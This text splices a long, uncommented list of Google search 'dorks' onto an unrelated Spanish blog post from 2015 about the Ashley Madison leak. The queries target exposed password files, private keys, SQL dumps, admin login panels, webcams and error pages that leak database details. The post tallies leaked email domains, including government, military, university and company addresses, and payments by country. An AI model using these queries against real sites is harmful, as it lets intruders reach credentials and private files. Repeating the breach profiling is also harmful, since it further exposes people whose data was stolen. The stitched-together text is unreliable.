inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005″ | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"

LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo

"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w

intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press


admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www” domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd

Elite Forum Version *.*"
Link Department"
"sets mode: +k"
"your password is" filetype:log
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)

Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and s?ri?ts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080″ +":3128″ +":80″ filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
inurl:confidential
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please…
RedKernel"
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:"ConnectionManager2″
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "

intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm

Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The s?ri?t whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
MYSQL error message: supplied argument….
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://” "www.eastgame.net"
"html allowed" guestbook
: vBulletin Version 1.1.5″
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Dudirectory" -site:duware.com
dudownload" -site:duware.com

lunes, 31 de agosto de 2015

Cosas interesantes encontradas en el leak de Ashley madison (II)

Hay mucho correo gratuito y de ISPs, pero también de universidad, además de empresas, administración… Vamos, que aquí no se salva nadie.

También está la información de los pagos (¡algunos de decenas de miles de euros!), donde hay eg.10 de cuentas @MADRID.ES, 2 de @MCAFEE.COM o un asesor del parlamento europeo, pero también ahí hay correos no válidos.

Top 10 de dominios:

GMAIL.COM       5450764 33.2245%
YAHOO.COM       4658560 28.3957%
HOTMAIL.COM     2277592 13.8828%
AOL.COM 756312  4.61002%
LIVE.COM        213440  1.301%
OUTLOOK.COM     181000  1.10327%
COMCAST.NET     145626  0.887647%
MSN.COM 127918  0.77971%
YMAIL.COM       116966  0.712953%
YAHOO.CA        102098  0.622327%

Dominios .es:

@hotmail.es 158851 50.9893%
@yahoo.es 89233 28.6427%
@outlook.es 22162 7.11374%
@terra.es 10885 3.49396%
@gmx.es 3936 1.26341%
@wanadoo.es 2091 0.671186%
@HOTMAIL.ES 2041 0.655137%
@gmail.es 1705 0.547285%
@YAHOO.ES 992 0.31842%
@ozu.es 990 0.317778%
@orangemail.es 894 0.286963%
@Yahoo.es 713 0.228865%
@movistar.es 600 0.192593%
@hotmai.es 510 0.163704%
@orange.es 482 0.154716%
@Hotmail.es 429 0.137704%
@OUTLOOK.ES 377 0.121013%
@homail.es 268 0.0860248%
@Outlook.es 245 0.0786421%
@TERRA.ES 223 0.0715804%
@aol.es 219 0.0702964%
@live.es 214 0.0686915%
@arrakis.es 202 0.0648396%
@vodafone.es 193 0.0619507%
@hotmeil.es 162 0.0520001%
@andaluciajunta.es 140 0.0449383%
@hotmal.es 140 0.0449383%
@telecable.es 138 0.0442964%
@hotmail.com.es 126 0.0404445%
@yaho.es 124 0.0398025%
@teleline.es 121 0.0388396%
@outlok.es 118 0.0378766%
@hotmil.es 111 0.0356297%
@yahho.es 93 0.0298519%
@hormail.es 88 0.028247%
@outloo.es 88 0.028247%
@hotamil.es 87 0.027926%
@msn.es 82 0.026321%
@htmail.es 80 0.0256791%
@yaoo.es 78 0.0250371%
@hoymail.es 76 0.0243951%
@ono.es 76 0.0243951%
@autlook.es 72 0.0231111%
@Terra.es 69 0.0221482%
@yahoo.com.es 66 0.0211852%
@hotmial.es 64 0.0205432%
@hotmail.ES 60 0.0192593%
@gemail.es 55 0.0176543%
@alumni.uv.es 54 0.0173334%
@outook.es 54 0.0173334%
@email.es 53 0.0170124%
@otmail.es 53 0.0170124%
@outllok.es 51 0.0163704%
@oulook.es 50 0.0160494%
@inicia.es 48 0.0154074%
@outloock.es 47 0.0150864%
@a.es 45 0.0144445%
@holmail.es 45 0.0144445%
@telefonica.es 44 0.0141235%
@ctv.es 43 0.0138025%
@GMX.ES 43 0.0138025%
@hitmail.es 41 0.0131605%
@hotamail.es 40 0.0128395%
@alu.ua.es 39 0.0125185%
@gotmail.es 39 0.0125185%
@usal.es 38 0.0121975%
@hotail.es 37 0.0118766%
@htomail.es 37 0.0118766%
@yhoo.es 36 0.0115556%
@outlock.es 35 0.0112346%
@outlook.com.es 35 0.0112346%
@WANADOO.ES 35 0.0112346%
@uotlook.es 34 0.0109136%
@juntadeandalucia.es 33 0.0105926%
@otlook.es 33 0.0105926%
@jerez.es 32 0.0102716%
@hayoo.es 31 0.00995063%
@hotmsil.es 31 0.00995063%
@OZU.ES 30 0.00962964%
@correo.ugr.es 29 0.00930866%
@gva.es 29 0.00930866%
@hotmaill.es 29 0.00930866%
@GMAIL.ES 28 0.00898767%
@hptmail.es 28 0.00898767%
@ahoo.es 27 0.00866668%
@jotmail.es 27 0.00866668%
@um.es 26 0.00834569%
@homtail.es 25 0.0080247%
@uco.es 25 0.0080247%
@yahooo.es 25 0.0080247%
@iberia.es 24 0.00770372%
@us.es 24 0.00770372%
@yahoo.ES 24 0.00770372%
@blackberry.orange.es 23 0.00738273%
@et.mde.es 23 0.00738273%
@Gmail.es 23 0.00738273%
@hotnail.es 23 0.00738273%
@icam.es 23 0.00738273%
@iespana.es 23 0.00738273%
@jet.es 23 0.00738273%
@uji.es 23 0.00738273%
@yohoo.es 23 0.00738273%
@pepe.es 22 0.00706174%
@pp.es 22 0.00706174%
@ymail.es 21 0.00674075%
@es.es 20 0.00641976%
@mobileemail.vodafone.es 20 0.00641976%
@unizar.es 20 0.00641976%
@yhaoo.es 20 0.00641976%
@endesa.es 19 0.00609877%
@google.es 19 0.00609877%
@utlook.es 19 0.00609877%
@arquired.es 18 0.00577779%
@lycos.es 18 0.00577779%
@ORANGEMAIL.ES 18 0.00577779%
@uv.es 18 0.00577779%
@yahhoo.es 18 0.00577779%
@alumni.unav.es 17 0.0054568%
@example.es 17 0.0054568%
@hotmali.es 17 0.0054568%
@icab.es 17 0.0054568%
@jahoo.es 17 0.0054568%
@yajoo.es 17 0.0054568%
@adslmail.es 16 0.00513581%
@hoitmail.es 16 0.00513581%
@mail.es 16 0.00513581%
@mundivia.es 16 0.00513581%
@tahoo.es 16 0.00513581%
@ucm.es 16 0.00513581%
@ugr.es 16 0.00513581%
@yayoo.es 16 0.00513581%
@adif.es 15 0.00481482%
@holtmail.es 15 0.00481482%
@hotmaul.es 15 0.00481482%
@icav.es 15 0.00481482%
@iies.es 15 0.00481482%
@live.uem.es 15 0.00481482%
@renfe.es 15 0.00481482%
@as.es 14 0.00449383%
@cgac.es 14 0.00449383%
@excite.es 14 0.00449383%
@outloook.es 14 0.00449383%
@tinet.fut.es 14 0.00449383%
@alumnos.unex.es 13 0.00417285%
@alum.us.es 13 0.00417285%
@edu.xunta.es 13 0.00417285%
@fastmail.es 13 0.00417285%
@hoail.es 13 0.00417285%
@hootmail.es 13 0.00417285%
@hotmaail.es 13 0.00417285%
@hotmaiil.es 13 0.00417285%
@hotmaol.es 13 0.00417285%
@houtlook.es 13 0.00417285%
@outlokk.es 13 0.00417285%
@outoolk.es 13 0.00417285%
@wanado.es 13 0.00417285%
@asd.es 12 0.00385186%
@carm.es 12 0.00385186%
@hhotmail.es 12 0.00385186%
@HOMAIL.ES 12 0.00385186%
@hotmail.es.es 12 0.00385186%
@hotmailo.es 12 0.00385186%
@hottmail.es 12 0.00385186%
@MOVISTAR.ES 12 0.00385186%
@opendeusto.es 12 0.00385186%
@orangecorreo.es 12 0.00385186%
@ouylook.es 12 0.00385186%
@udc.es 12 0.00385186%
@comb.es 11 0.00353087%
@ee.es 11 0.00353087%
@estudiantes.unileon.es 11 0.00353087%
@fn.mde.es 11 0.00353087%
@hot.es 11 0.00353087%
@hotmael.es 11 0.00353087%
@mixmail.es 11 0.00353087%
@ORANGE.ES 11 0.00353087%
@tera.es 11 0.00353087%
@tiscali.es 11 0.00353087%
@upv.es 11 0.00353087%
(…)
(empiezo a resumir)
@alumnes.udl.es 8 0.00256791%
@alumnos.uchceu.es 8 0.00256791%
@alumnos.unican.es 8 0.00256791%
@indra.es 8 0.00256791%
@oc.mde.es 8 0.00256791%
@sevilla.es 8 0.00256791%
@uca.es 8 0.00256791%
@uniovi.es 8 0.00256791%
@abc.es 7 0.00224692%
@aena.es 7 0.00224692%
@ctac.es 7 0.00224692%
@ea.mde.es 7 0.00224692%
@er.es 7 0.00224692%
@uam.es 7 0.00224692%
@aragon.es 6 0.00192593%
@badajoz.es 6 0.00192593%
@cam.upv.es 6 0.00192593%
@comerciales.es 6 0.00192593%
@cv.gva.es 6 0.00192593%
@eee.es 6 0.00192593%
@estumail.ucm.es 6 0.00192593%
@Fons.es 6 0.00192593%
@gmax.es 6 0.00192593%
@guardiacivil.es 6 0.00192593%
@banesto.es 5 0.00160494%
@bankinter.es 5 0.00160494%
@cajamar.es 5 0.00160494%
@cecot.es 5 0.00160494%
@coam.es 5 0.00160494%
@cograsova.es 5 0.00160494%
@coitt.es 5 0.00160494%
@fomento.es 5 0.00160494%
@justicia.es 5 0.00160494%
@madrid.es 5 0.00160494%
@marca.es 5 0.00160494%
@postal.uv.es 5 0.00160494%
@rmseguros.es 5 0.00160494%
@TELEFONICA.ES 5 0.00160494%
@uma.es 5 0.00160494%
@UOTLOOK.ES 5 0.00160494%
@usc.es 5 0.00160494%
@castillalamancha.es 4 0.00128395%
@gruposantander.es 4 0.00128395%
@iberdrola.es 4 0.00128395%
@icajaen.es 4 0.00128395%
@icali.es 4 0.00128395%
@instanet.es 4 0.00128395%
@janira.es 4 0.00128395%
@jccm.es 4 0.00128395%
@kelman.es 4 0.00128395%
@lacaixa.es 4 0.00128395%
@leroymerlin.es 4 0.00128395%
@love.es 4 0.00128395%
@mail.ucv.es 4 0.00128395%
@mbe.es 4 0.00128395%
@meditex.es 4 0.00128395%
@ocaso.es 4 0.00128395%
@rai.usc.es 4 0.00128395%
@salud.aragon.es 4 0.00128395%
@ual.es 4 0.00128395%
@urjc.es 4 0.00128395%
@uvigo.es 4 0.00128395%
@alumnos.uvigo.es 3 0.000962964%
@alum.uax.es 3 0.000962964%
@alum.uca.es 3 0.000962964%
@alu.uclm.es 3 0.000962964%
@alu.uhu.es 3 0.000962964%
@amoraoptical.es 3 0.000962964%
@ANDALUCIAJUNTA.ES 3 0.000962964%
@arq.uva.es 3 0.000962964%
@aytobadajoz.es 3 0.000962964%
@campus.uab.es 3 0.000962964%
@correos.es 3 0.000962964%
@cruzroja.es 3 0.000962964%
@dgp.mir.es 3 0.000962964%
@diputada.congreso.es 3 0.000962964%
@elpais.es 3 0.000962964%
@epsa.upv.es 3 0.000962964%
@epsg.upv.es 3 0.000962964%
@estudiante.ujaen.es 3 0.000962964%
@etsia.upv.es 3 0.000962964%
@heineken.es 3 0.000962964%
@industria.ccoo.es 3 0.000962964%
@phonehouse.es 3 0.000962964%
@red.ujaen.es 3 0.000962964%
@rtve.es 3 0.000962964%
@satse.es 3 0.000962964%
@securitasdirect.es 3 0.000962964%
@segurosjorgegalan.es 3 0.000962964%
@seinco.es 3 0.000962964%
@sek.es 3 0.000962964%
@senado.es 3 0.000962964%
@sergas.es 3 0.000962964%
@upct.es 3 0.000962964%
@upo.es 3 0.000962964%
@ure.es 3 0.000962964%
@usp.ceu.es 3 0.000962964%
@vaesa.gec.es 3 0.000962964%
@valencia.es 3 0.000962964%
@vaseco.es 3 0.000962964%
@alumni.eude.es 2 0.000641976%
@alumnos.nebrija.es 2 0.000641976%
@alumnos.urjc.es 2 0.000641976%
@alu.ulpgc.es 2 0.000641976%
@alu.umh.es 2 0.000641976%
@aytolacoruna.es 2 0.000641976%
@aytolalaguna.es 2 0.000641976%
@bbva.es 1 0.000320988%
@ceuta.es 2 0.000641976%
@cfhh.es 2 0.000641976%
@cfnavarra.es 2 0.000641976%
@cgpj.es 2 0.000641976%
@comercio.mineco.es 2 0.000641976%
@dipgra.es 2 0.000641976%
@dipucadiz.es 2 0.000641976%
@diputado.congreso.es 2 0.000641976%
@edu.uah.es 2 0.000641976%
@efe.es 2 0.000641976%
@elcorteingles.es 2 0.000641976%
@gobcantabria.es 2 0.000641976%
@iesandorra.es 2 0.000641976%
@iesvalledeljerteplasencia.es 2 0.000641976%
@JEREZ.ES 2 0.000641976%
@libertyseguros.es 2 0.000641976%
@seat.es 2 0.000641976%
@uax.es 2 0.000641976%
@ubu.es 2 0.000641976%
@uc3m.es 2 0.000641976%
@ucv.udc.es 2 0.000641976%
@uem.es 2 0.000641976%
@ufg.es 2 0.000641976%
@uic.es 2 0.000641976%
@ull.edu.es 2 0.000641976%
@uned.es 2 0.000641976%
@unipost.es 2 0.000641976%
@uno.es 2 0.000641976%
@upm.es 2 0.000641976%
@upvnet.upv.es 2 0.000641976%
@agro.uva.es 1 0.000320988%
@aytoburgos.es 1 0.000320988%
@ayto-ciuadreal.es 1 0.000320988%
@aytopuentegenil.es 1 0.000320988%
@aytosalamanca.es 1 0.000320988%
@aytotomelloso.es 1 0.000320988%
@burgos.es 1 0.000320988%
@CAJAESPANA.ES 1 0.000320988%
@cajamurcia.es 1 0.000320988%
@cajastur.es 1 0.000320988%
@CAJASTUR.ES 1 0.000320988%
@cajatur.es 1 0.000320988%
@colegiolainmaculada.es 1 0.000320988%
@DANONE.ES 1 0.000320988%
@eco.juntaex.es 1 0.000320988%
@ecolav.es 1 0.000320988%
@ecomadrid.es 1 0.000320988%
@eco.uc3m.es 1 0.000320988%
@eduardoruiz.es 1 0.000320988%
@educacio.caib.es 1 0.000320988%
@educacion.navarra.es 1 0.000320988%
@educandoalfuego.es 1 0.000320988%
@educan.es 1 0.000320988%
@Edu.xunta.es 1 0.000320988%
@ecuxseguridad.es 1 0.000320988%
@edelvives.es 1 0.000320988%
@fnac.es 1 0.000320988%
@funerariadejesus.es 1 0.000320988%
@funge.uva.es 1 0.000320988%
@gijon.es 1 0.000320988%
@gmail.outlook.es 1 0.000320988%
@grupobbva.es 1 0.000320988%
@mibbva.es 1 0.000320988%
@microsoft.es 1 0.000320988%
@proconsa.es 1 0.000320988%
@puleva.es 1 0.000320988%
@PULEVA.ES 1 0.000320988%
@qf.uva.es 1 0.000320988%
@ucavila.es 1 0.000320988%
@uchceu.es 1 0.000320988%
@uclm.es 1 0.000320988%
@ucoeleo.es 1 0.000320988%
@UCO.ES 1 0.000320988%
@udada.es 1 0.000320988%
@udon.es 1 0.000320988%
@UGR.es 1 0.000320988%
@ugvhg.es 1 0.000320988%
@uhu.es 1 0.000320988%
@uhwjhf.es 1 0.000320988%
@uib.es 1 0.000320988%
@ujaen.es 1 0.000320988%
@ulloahotmail.es 1 0.000320988%
@ulpgc.es 1 0.000320988%
@umano.es 1 0.000320988%
@umivale.es 1 0.000320988%
@uml.es 1 0.000320988%
@umor.es 1 0.000320988%
@unav.es 1 0.000320988%
@zara.es 1 0.000320988%

…y un largo etcétera. hasta 5730 dominios .es de los 33623 totales.


Países de origen de las transacciones (no disponible en todas)

US 7591509 78.3125%
CA 823746 8.4976%
BR 197032 2.03254%
AU 146745 1.51379%
TW 118338 1.22075%
CL 109875 1.13345%
ZA 78126 0.805932%
AR 75314 0.776924%
JP 74165 0.765071%
GB 57901 0.597295%
CO 53466 0.551545%
NZ 39648 0.409001%
MX 36701 0.3786%
ES 33213 0.342619% ←
IN 27862 0.287419%
KR 17947 0.185138%
HK 16704 0.172315%
FR 15115 0.155923%
IT 14624 0.150858%
VE 12012 0.123913%
SE 10879 0.112226%
CH 10463 0.107934%
IL 8854 0.0913361%
NO 7242 0.074707%
DE 6365 0.0656601%
IE 6082 0.0627407%
CN 6076 0.0626788%
FI 5875 0.0606053%
PT 5797 0.0598007%
SG 5183 0.0534668%
GR 3573 0.0368584%
NL 3360 0.0346611%
AT 2427 0.0250364%
BE 2419 0.0249539%
DK 2064 0.0212918%
AE 1600 0.0165053%
PE 1596 0.016464%
PR 1589 0.0163918%
CZ 1528 0.0157625%
HU 1183 0.0122036%
PL 1003 0.0103467%
TR 925 0.00954212%
BM 912 0.00940801%
MY 749 0.00772653%
UY 724 0.00746864%
AF 681 0.00702506%
PH 544 0.0056118%
MO 503 0.00518885%
LU 402 0.00414695%
TH 384 0.00396127%
SK 359 0.00370337%
SA 358 0.00369306%
PA 350 0.00361053%
EC 261 0.00269242%
QA 232 0.00239327%
VI 227 0.00234169%
KW 209 0.002156%
BS 185 0.00190842%
KY 177 0.0018259%
CR 174 0.00179495%
UZ 168 0.00173305%
NA 166 0.00171242%
TT 156 0.00160926%
GU 154 0.00158863%
OM 151 0.00155769%
GE 141 0.00145453%
HR 132 0.00136169%
RU 131 0.00135137%
IS 125 0.00128948%
GT 123 0.00126884%
JO 123 0.00126884%
PY 116 0.00119663%
ID 105 0.00108316%
RO 104 0.00107284%
PK 103 0.00106253%
DO 101 0.0010419%
SV 101 0.0010419%
CY 98 0.00101095%
MZ 92 0.000949054%
EG 89 0.000918106%
FX 88 0.00090779%
JM 85 0.000876843%
GP 83 0.000856211%
MC 71 0.000732422%
AO 69 0.00071179%
UG 69 0.00071179%
LK 67 0.000691159%
VA 66 0.000680843%
LB 64 0.000660211%
LI 64 0.000660211%
VU 61 0.000629264%
WF 61 0.000629264%
BB 59 0.000608632%
KE 56 0.000577685%
ZM 55 0.000567369%
CF 50 0.00051579%
ZW 50 0.00051579%
BW 49 0.000505474%
HN 49 0.000505474%
YE 49 0.000505474%
LV 47 0.000484843%
SZ 47 0.000484843%
VG 47 0.000484843%
BH 46 0.000474527%
BO 44 0.000453895%
NC 39 0.000402316%
VN 39 0.000402316%
MT 38 0.000392%
AL 37 0.000381685%
PG 36 0.000371369%
GI 34 0.000350737%
TV 34 0.000350737%
BG 33 0.000340421%
